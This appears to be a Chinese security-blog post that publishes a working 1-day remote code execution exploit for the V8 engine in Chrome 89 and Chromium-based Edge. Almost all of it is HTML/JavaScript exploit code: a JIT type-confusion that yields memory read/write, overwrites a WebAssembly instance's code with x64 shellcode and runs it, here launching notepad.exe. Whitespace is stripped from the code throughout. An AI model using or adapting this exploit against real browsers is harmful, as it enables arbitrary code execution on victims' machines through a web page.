[HW漏洞] Chrome 1 day V8引擎远程代码执行(新)

  • A+
所属分类:安全文章

影响范围

Google Chrome <= 89.0.4389.128

基于Chromium内核的Microsoft Edge <= 89.0.774.76

其他基于V8引擎的浏览器

html文件

<script>
    functiongc(){
    for(vari=0;i<0x80000;++i){
    vara=newArrayBuffer();
    }
    }
    letshellcode=[0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
    0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
    0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
    0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
    0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
    0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
    0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
    0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
    0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
    0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
    0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
    0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
    0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,0xDA,0xFF,0xD5,0x6E,0x6F,0x74,0x65,0x70,
    0x61,0x64,0x2E,0x65,0x78,0x65,0x00];
    varwasmCode=newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
    varwasmModule=newWebAssembly.Module(wasmCode);
    varwasmInstance=newWebAssembly.Instance(wasmModule);
    varmain=wasmInstance.exports.main;
    varbf=newArrayBuffer(8);
    varbfView=newDataView(bf);
    functionfLow(f){
    bfView.setFloat64(0,f,true);
    return(bfView.getUint32(0,true));
    }
    functionfHi(f){
    bfView.setFloat64(0,f,true);
    return(bfView.getUint32(4,true))
    }
    functioni2f(low,hi){
    bfView.setUint32(0,low,true);
    bfView.setUint32(4,hi,true);
    returnbfView.getFloat64(0,true);
    }
    functionf2big(f){
    bfView.setFloat64(0,f,true);
    returnbfView.getBigUint64(0,true);
    }
    functionbig2f(b){
    bfView.setBigUint64(0,b,true);
    returnbfView.getFloat64(0,true);
    }
    classLeakArrayBufferextendsArrayBuffer{
    constructor(size){
    super(size);
    this.slot=0xb33f;
    }
    }
    functionfoo(a){
    letx=-1;
    if(a)x=0xFFFFFFFF;
    vararr=newArray(Math.sign(0-Math.max(0,x,-1)));
    arr.shift();
    letlocal_arr=Array(2);
    local_arr[0]=5.1;//4014666666666666
    letbuff=newLeakArrayBuffer(0x1000);//byteLength idx=8
    arr[0]=0x1122;
    return[arr,local_arr,buff];
    }
    for(vari=0;i<0x10000;++i)
    foo(false);
    gc();gc();
    [corrput_arr,rwarr,corrupt_buff]=foo(true);
    corrput_arr[12]=0x22444;
    deletecorrput_arr;
    functionsetbackingStore(hi,low){
    rwarr[4]=i2f(fLow(rwarr[4]),hi);
    rwarr[5]=i2f(low,fHi(rwarr[5]));
    }
    functionleakObjLow(o){
    corrupt_buff.slot=o;
    return(fLow(rwarr[9])-1);
    }
    letcorrupt_view=newDataView(corrupt_buff);
    letcorrupt_buffer_ptr_low=leakObjLow(corrupt_buff);
    letidx0Addr=corrupt_buffer_ptr_low-0x10;
    letbaseAddr=(corrupt_buffer_ptr_low&0xffff0000)-((corrupt_buffer_ptr_low&0xffff0000)%0x40000)+0x40000;
    letdelta=baseAddr+0x1c-idx0Addr;
    if((delta%8)==0){
    letbaseIdx=delta/8;
    this.base=fLow(rwarr[baseIdx]);
    }else{
    letbaseIdx=((delta-(delta%8))/8);
    this.base=fHi(rwarr[baseIdx]);
    }
    letwasmInsAddr=leakObjLow(wasmInstance);
    setbackingStore(wasmInsAddr,this.base);
    letcode_entry=corrupt_view.getFloat64(13*8,true);
    setbackingStore(fLow(code_entry),fHi(code_entry));
    for(leti=0;i<shellcode.length;i++){
    corrupt_view.setUint8(i,shellcode[i]);
    }
    main();
    </script>

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: